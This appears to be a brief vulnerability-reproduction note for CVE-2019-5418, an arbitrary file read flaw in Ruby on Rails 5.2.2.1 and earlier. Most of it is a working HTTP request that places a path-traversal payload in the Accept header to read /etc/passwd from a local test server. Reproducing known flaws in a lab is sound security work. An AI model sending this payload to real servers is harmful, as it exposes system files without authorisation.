Rails Accept Arbitrary File Reading Vulnerability Cve 2019 5418
Rails Accept Arbitrary File Reading Vulnerability Cve 2019 5418
Rails Accept Arbitrary file reading vulnerability CVE-2019-5418
Vulnerability Description
Ruby on Rails is a web application framework, a relatively new web application framework built on the Ruby language.
Vulnerability Impact
Rail <= 5.2.2.1
Network surveying and mapping
title=”Ruby On Rails”
Vulnerability reappears
Main page
Verify the request package
1
2
3
4
5
6
7
GET /robots HTTP/1.1
Host: 127.0.0.1:3000
Accept-Encoding: gzip, deflate
Accept: ../../../../../../../../etc/passwd%7B%7B
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
This post is licensed under CC BY 4.0 by the author.